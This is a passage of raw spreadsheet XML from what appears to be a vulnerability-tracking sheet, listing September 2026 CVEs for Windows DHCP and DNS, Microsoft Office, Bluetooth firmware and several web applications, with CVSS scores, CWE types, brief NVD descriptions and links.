microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1168" s="5" t="inlineStr" /><c r="M1168" s="5" t="inlineStr" /><c r="N1168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1168" s="5" t="inlineStr" /><c r="Q1168" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1168" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t></is></c></row><row r="1169"><c r="A1169" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1169" s="5" t="inlineStr"><is><t>CVE-2026-77886</t></is></c><c r="D1169" s="5" t="n"><v>7.5</v></c><c r="E1169" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1169" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1169" s="5" t="inlineStr" /><c r="H1169" s="5" t="n"><v>0.008</v></c><c r="I1169" s="5" t="inlineStr" /><c r="J1169" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1169" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1169" s="5" t="inlineStr" /><c r="M1169" s="5" t="inlineStr" /><c r="N1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1169" s="5" t="inlineStr" /><c r="Q1169" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1169" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t></is></c></row><row r="1170"><c r="A1170" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1170" s="5" t="inlineStr"><is><t>CVE-2026-77888</t></is></c><c r="D1170" s="5" t="n"><v>7.5</v></c><c r="E1170" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1170" s="5" t="inlineStr" /><c r="H1170" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1170" s="5" t="inlineStr" /><c r="J1170" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1170" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1170" s="5" t="inlineStr" /><c r="M1170" s="5" t="inlineStr" /><c r="N1170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1170" s="5" t="inlineStr" /><c r="Q1170" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1170" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t></is></c></row><row r="1171"><c r="A1171" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1171" s="5" t="inlineStr"><is><t>CVE-2026-77889</t></is></c><c r="D1171" s="5" t="n"><v>7.5</v></c><c r="E1171" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1171" s="5" t="inlineStr" /><c r="H1171" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1171" s="5" t="inlineStr" /><c r="J1171" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1171" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1171" s="5" t="inlineStr" /><c r="M1171" s="5" t="inlineStr" /><c r="N1171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1171" s="5" t="inlineStr" /><c r="Q1171" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1171" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t></is></c></row><row r="1172"><c r="A1172" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1172" s="5" t="inlineStr"><is><t>CVE-2026-77890</t></is></c><c r="D1172" s="5" t="n"><v>7.5</v></c><c r="E1172" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1172" s="5" t="inlineStr" /><c r="H1172" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1172" s="5" t="inlineStr" /><c r="J1172" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1172" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1172" s="5" t="inlineStr" /><c r="M1172" s="5" t="inlineStr" /><c r="N1172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1172" s="5" t="inlineStr" /><c r="Q1172" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R1172" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t></is></c></row><row r="1173"><c r="A1173" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1173" s="5" t="inlineStr"><is><t>CVE-2026-77893</t></is></c><c r="D1173" s="5" t="n"><v>7.5</v></c><c r="E1173" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1173" s="5" t="inlineStr" /><c r="H1173" s="5" t="n"><v>0.008</v></c><c r="I1173" s="5" t="inlineStr" /><c r="J1173" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1173" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1173" s="5" t="inlineStr" /><c r="M1173" s="5" t="inlineStr" /><c r="N1173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1173" s="5" t="inlineStr" /><c r="Q1173" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1173" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t></is></c></row><row r="1174"><c r="A1174" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1174" s="5" t="inlineStr"><is><t>CVE-2026-77895</t></is></c><c r="D1174" s="5" t="n"><v>7.5</v></c><c r="E1174" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1174" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1174" s="5" t="inlineStr" /><c r="H1174" s="5" t="n"><v>0.011</v></c><c r="I1174" s="5" t="inlineStr" /><c r="J1174" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1174" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1174" s="5" t="inlineStr" /><c r="M1174" s="5" t="inlineStr" /><c r="N1174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1174" s="5" t="inlineStr" /><c r="Q1174" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1174" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t></is></c></row><row r="1175"><c r="A1175" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1175" s="5" t="inlineStr"><is><t>CVE-2026-77898</t></is></c><c r="D1175" s="5" t="n"><v>7.5</v></c><c r="E1175" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1175" s="5" t="inlineStr" /><c r="H1175" s="5" t="n"><v>0.005</v></c><c r="I1175" s="5" t="inlineStr" /><c r="J1175" s="5" t="inlineStr" /><c r="K1175" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1175" s="5" t="inlineStr" /><c r="M1175" s="5" t="inlineStr" /><c r="N1175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1175" s="5" t="inlineStr" /><c r="Q1175" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1175" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S1175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t></is></c></row><row r="1176"><c r="A1176" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1176" s="5" t="inlineStr"><is><t>CVE-2026-78523</t></is></c><c r="D1176" s="5" t="n"><v>7.5</v></c><c r="E1176" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1176" s="5" t="inlineStr" /><c r="H1176" s="5" t="n"><v>0.01</v></c><c r="I1176" s="5" t="inlineStr" /><c r="J1176" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1176" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1176" s="5" t="inlineStr" /><c r="M1176" s="5" t="inlineStr" /><c r="N1176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1176" s="5" t="inlineStr" /><c r="Q1176" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1176" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t></is></c></row><row r="1177"><c r="A1177" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1177" s="5" t="inlineStr"><is><t>CVE-2026-78574</t></is></c><c r="D1177" s="5" t="n"><v>7.5</v></c><c r="E1177" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1177" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1177" s="5" t="inlineStr" /><c r="H1177" s="5" t="n"><v>0.001</v></c><c r="I1177" s="5" t="inlineStr" /><c r="J1177" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1177" s="5" t="inlineStr" /><c r="L1177" s="5" t="inlineStr" /><c r="M1177" s="5" t="inlineStr" /><c r="N1177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1177" s="5" t="inlineStr" /><c r="Q1177" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="R1177" s="5" t="inlineStr"><is><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is></c><c r="S1177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t></is></c></row><row r="1178"><c r="A1178" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1178" s="5" t="inlineStr"><is><t>CVE-2026-78837</t></is></c><c r="D1178" s="5" t="n"><v>7.5</v></c><c r="E1178" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1178" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1178" s="5" t="inlineStr" /><c r="H1178" s="5" t="n"><v>0.003</v></c><c r="I1178" s="5" t="inlineStr" /><c r="J1178" s="5" t="inlineStr" /><c r="K1178" s="5" t="inlineStr" /><c r="L1178" s="5" t="inlineStr" /><c r="M1178" s="5" t="inlineStr" /><c r="N1178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1178" s="5" t="inlineStr" /><c r="Q1178" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1178" s="5" t="inlineStr"><is><t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="S1178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t></is></c></row><row r="1179"><c r="A1179" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1179" s="5" t="inlineStr"><is><t>CVE-2026-79377</t></is></c><c r="D1179" s="5" t="n"><v>7.5</v></c><c r="E1179" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1179" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1179" s="5" t="inlineStr" /><c r="H1179" s="5" t="n"><v>0.004</v></c><c r="I1179" s="5" t="inlineStr" /><c r="J1179" s="5" t="inlineStr" /><c r="K1179" s="5" t="inlineStr" /><c r="L1179" s="5" t="inlineStr" /><c r="M1179" s="5" t="inlineStr" /><c r="N1179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1179" s="5" t="inlineStr" /><c r="Q1179" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1179" s="5" t="inlineStr"><is><t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="S1179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t></is></c></row><row r="1180"><c r="A1180" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1180" s="5" t="inlineStr"><is><t>CVE-2026-79378</t></is></c><c r="D1180" s="5" t="n"><v>7.5</v></c><c r="E1180" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1180" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1180" s="5" t="inlineStr" /><c r="H1180" s="5" t="n"><v>0.004</v></c><c r="I1180" s="5" t="inlineStr" /><c r="J1180" s="5" t="inlineStr" /><c r="K1180" s="5" t="inlineStr" /><c r="L1180" s="5" t="inlineStr" /><c r="M1180" s="5" t="inlineStr" /><c r="N1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1180" s="5" t="inlineStr" /><c r="Q1180" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1180" s="5" t="inlineStr"><is><t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="S1180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t></is></c></row><row r="1181"><c r="A1181" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1181" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1181" s="5" t="inlineStr"><is><t>CVE-2026-79407</t></is></c><c r="D1181" s="5" t="n"><v>7.5</v></c><c r="E1181" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1181" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1181" s="5" t="inlineStr" /><c r="H1181" s="5" t="n"><v>0.004</v></c><c r="I1181" s="5" t="inlineStr" /><c r="J1181" s="5" t="inlineStr" /><c r="K1181" s="5" t="inlineStr" /><c r="L1181" s="5" t="inlineStr" /><c r="M1181" s="5" t="inlineStr" /><c r="N1181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1181" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1181" s="5" t="inlineStr" /><c r="Q1181" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1181" s="5" t="inlineStr"><is><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is></c><c r="S1181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79407</t></is></c></row><row r="1182"><c r="A1182" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1182" s="5" t="inlineStr"><is><t>CVE-2026-79572</t></is></c><c r="D1182" s="5" t="n"><v>7.5</v></c><c r="E1182" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1182" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1182" s="5" t="inlineStr" /><c r="H1182" s="5" t="n"><v>0.003</v></c><c r="I1182" s="5" t="inlineStr" /><c r="J1182" s="5" t="inlineStr" /><c r="K1182" s="5" t="inlineStr" /><c r="L1182" s="5" t="inlineStr" /><c r="M1182" s="5" t="inlineStr" /><c r="N1182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1182" s="5" t="inlineStr" /><c r="Q1182" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="R1182" s="5" t="inlineStr"><is><t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t></is></c><c r="S1182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t></is></c></row><row r="1183"><c r="A1183" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1183" s="5" t="inlineStr"><is><t>CVE-2026-79575</t></is></c><c r="D1183" s="5" t="n"><v>7.5</v></c><c r="E1183" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1183" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1183" s="5" t="inlineStr" /><c r="H1183" s="5" t="n"><v>0.002</v></c><c r="I1183" s="5" t="inlineStr" /><c r="J1183" s="5" t="inlineStr" /><c r="K1183" s="5" t="inlineStr" /><c r="L1183" s="5" t="inlineStr" /><c r="M1183" s="5" t="inlineStr" /><c r="N1183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1183" s="5" t="inlineStr" /><c r="Q1183" s="5" t="inlineStr"><is><t>CWE-330</t></is></c><c r="R1183" s="5" t="inlineStr"><is><t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t></is></c><c r="S1183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t></is></c></row><row r="1184"><c r="A1184" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1184" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1184" s="5" t="inlineStr"><is><t>CVE-2026-81270</t></is></c><c r="D1184" s="5" t="n"><v>7.5</v></c><c r="E1184" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1184" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1184" s="5" t="inlineStr" /><c r="H1184" s="5" t="n"><v>0.004</v></c><c r="I1184" s="5" t="inlineStr" /><c r="J1184" s="5" t="inlineStr" /><c r="K1184" s="5" t="inlineStr" /><c r="L1184" s="5" t="inlineStr" /><c r="M1184" s="5" t="inlineStr" /><c r="N1184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1184" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1184" s="5" t="inlineStr" /><c r="Q1184" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1184" s="5" t="inlineStr"><is><t>Apache Allura: exposure of non-public information via search.



This issue affects Apache Allura: through 1.20.0.



Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t></is></c><c r="S1184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81270</t></is></c></row><row r="1185"><c r="A1185" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1185" s="5" t="inlineStr"><is><t>CVE-2026-81355</t></is></c><c r="D1185" s="5" t="n"><v>7.5</v></c><c r="E1185" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1185" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1185" s="5" t="inlineStr" /><c r="H1185" s="5" t="n"><v>0.002</v></c><c r="I1185" s="5" t="inlineStr" /><c r="J1185" s="5" t="inlineStr" /><c r="K1185" s="5" t="inlineStr" /><c r="L1185" s="5" t="inlineStr" /><c r="M1185" s="5" t="inlineStr" /><c r="N1185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1185" s="5" t="inlineStr" /><c r="Q1185" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1185" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t></is></c><c r="S1185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t></is></c></row><row r="1186"><c r="A1186" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1186" s="5" t="inlineStr"><is><t>CVE-2026-81381</t></is></c><c r="D1186" s="5" t="n"><v>7.5</v></c><c r="E1186" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1186" s="5" t="inlineStr" /><c r="H1186" s="5" t="n"><v>0.006</v></c><c r="I1186" s="5" t="inlineStr" /><c r="J1186" s="5" t="inlineStr" /><c r="K1186" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1186" s="5" t="inlineStr" /><c r="M1186" s="5" t="inlineStr" /><c r="N1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1186" s="5" t="inlineStr" /><c r="Q1186" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1186" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t></is></c></row><row r="1187"><c r="A1187" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1187" s="5" t="inlineStr"><is><t>CVE-2026-81790</t></is></c><c r="D1187" s="5" t="n"><v>7.5</v></c><c r="E1187" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1187" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1187" s="5" t="inlineStr" /><c r="H1187" s="5" t="n"><v>0.003</v></c><c r="I1187" s="5" t="inlineStr" /><c r="J1187" s="5" t="inlineStr" /><c r="K1187" s="5" t="inlineStr" /><c r="L1187" s="5" t="inlineStr" /><c r="M1187" s="5" t="inlineStr" /><c r="N1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1187" s="5" t="inlineStr" /><c r="Q1187" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1187" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t></is></c><c r="S1187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t></is></c></row><row r="1188"><c r="A1188" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1188" s="5" t="inlineStr"><is><t>CVE-2026-83989</t></is></c><c r="D1188" s="5" t="n"><v>7.5</v></c><c r="E1188" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1188" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1188" s="5" t="inlineStr" /><c r="H1188" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1188" s="5" t="inlineStr" /><c r="J1188" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K118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88" s="5" t="inlineStr" /><c r="M1188" s="5" t="inlineStr" /><c r="N1188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1188" s="5" t="inlineStr" /><c r="Q1188" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1188" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t></is></c></row><row r="1189"><c r="A1189" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1189" s="5" t="inlineStr"><is><t>CVE-2026-84001</t></is></c><c r="D1189" s="5" t="n"><v>7.5</v></c><c r="E1189" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1189" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1189" s="5" t="inlineStr" /><c r="H1189" s="5" t="n"><v>0.006</v></c><c r="I1189" s="5" t="inlineStr" /><c r="J1189" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K118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189" s="5" t="inlineStr" /><c r="M1189" s="5" t="inlineStr" /><c r="N1189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1189" s="5" t="inlineStr" /><c r="Q1189" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1189" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t></is></c></row><row r="1190"><c r="A1190" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1190" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1190" s="5" 